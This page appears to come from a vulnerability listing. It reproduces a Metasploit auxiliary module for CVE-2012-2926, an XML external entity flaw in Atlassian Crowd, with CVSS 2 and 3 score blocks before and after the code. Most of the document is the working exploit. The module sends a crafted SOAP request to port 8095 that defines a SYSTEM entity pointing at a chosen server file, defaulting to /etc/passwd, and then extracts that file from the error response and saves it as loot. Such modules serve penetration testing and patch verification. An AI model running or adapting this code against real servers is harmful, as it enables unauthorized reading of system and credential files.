CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:N/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
This module simply attempts to read a remote file from the server using a vulnerability in the way Atlassian Crowd handles XML files. The vulnerability occurs while trying to expand external entities with the SYSTEM identifier. This module has been tested successfully on Linux and Windows installations of Crowd.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Atlassian Crowd XML Entity Expansion Remote File Access',
'Description' => %q{
This module simply attempts to read a remote file from the server using a
vulnerability in the way Atlassian Crowd handles XML files. The vulnerability
occurs while trying to expand external entities with the SYSTEM identifier. This
module has been tested successfully on Linux and Windows installations of Crowd.
},
'References' =>
[
[ 'CVE', '2012-2926' ],
[ 'OSVDB', '82274' ],
[ 'BID', '53595' ],
[ 'URL', 'https://neg9.org/' ], # General
[ 'URL', 'https://confluence.atlassian.com/crowd/crowd-security-advisory-2012-05-17-283641186.html']
],
'Author' =>
[
'Will Caput', # Vulnerability discovery and Metasploit module
'Trevor Hartman', # Vulnerability discovery
'Thaddeus Bogner', # Metasploit module
'juan vazquez' # Metasploit module help
],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(8095),
OptString.new('TARGETURI', [true, 'Path to Crowd', '/crowd/services']),
OptString.new('RFILE', [true, 'Remote File', '/etc/passwd'])
])
register_autofilter_ports([ 8095 ])
end
def run_host(ip)
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET'})
if not res
print_error("#{rhost}:#{rport} Unable to connect")
return
end
accessfile(ip)
end
def accessfile(rhost)
uri = normalize_uri(target_uri.path)
print_status("#{rhost}:#{rport} Connecting to Crowd SOAP Interface")
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
xmlaut = 'http://authentication.integration.crowd.atlassian.com'
xmlsoap = 'http://soap.integration.crowd.atlassian.com'
entity = Rex::Text.rand_text_alpha(rand(4) + 4)
data = "<!DOCTYPE foo [<!ENTITY #{entity} SYSTEM \"file://#{datastore['RFILE']}\"> ]>" + "\r\n"
data << '<soapenv:Envelope xmlns:soapenv="' + soapenv + '" xmlns:urn="urn:SecurityServer" xmlns:aut="' + xmlaut + '" xmlns:soap="' + xmlsoap + '">' + "\r\n"
data << '<soapenv:Header/>' + "\r\n"
data << '<soapenv:Body>' + "\r\n"
data << '<urn:addAllPrincipals>' + "\r\n"
data << '<urn:in0>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<aut:name>?</aut:name>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<aut:token>?</aut:token>' + "\r\n"
data << '</urn:in0>' + "\r\n"
data << '<urn:in1>' + "\r\n"
data << '<!--Zero or more repetitions:-->' + "\r\n"
data << '<soap:SOAPPrincipalWithCredential>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<soap:passwordCredential>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<aut:credential>?</aut:credential>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<aut:encryptedCredential>'
data << "?&#{entity};"
data << '</aut:encryptedCredential>' + "\r\n"
data << '</soap:passwordCredential>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<soap:principal>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<soap:ID>?</soap:ID>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<soap:active>?</soap:active>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<soap:attributes>' + "\r\n"
data << '<!--Zero or more repetitions:-->' + "\r\n"
data << '<soap:SOAPAttribute>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<soap:name>?</soap:name>' + "\r\n"
data << '<!--Optional:-->' + "\r\n"
data << '<soap:values>' + "\r\n"
data << '<!--Zero or more repetitions:-->' + "\r\n"
data << '<urn:string>?</urn:string>' + "\r\n"
data << '</soap:values>' + "\r\n"
data << '</soap:SOAPAttribute>' + "\r\n"
data << '</soap:attributes>' + "\r\n"
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'ctype' => 'text/xml; charset=UTF-8',
'data' => data,
'headers' => {
'SOAPAction' => '""',
}}, 60)
if res and res.code == 500
case res.body
when /<faultstring\>Invalid boolean value: \?(.*)<\/faultstring>/m
loot = $1
if not loot or loot.empty?
print_status("#{rhost}#{rport} Retrieved empty file from #{rhost}:#{rport}")
return
end
f = ::File.basename(datastore['RFILE'])
path = store_loot('atlassian.crowd.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
print_good("#{rhost}:#{rport} Atlassian Crowd - #{datastore['RFILE']} saved in #{path}")
return
end
end
print_error("#{rhost}#{rport} Failed to retrieve file from #{rhost}:#{rport}")
end
end
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:N/A:P
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H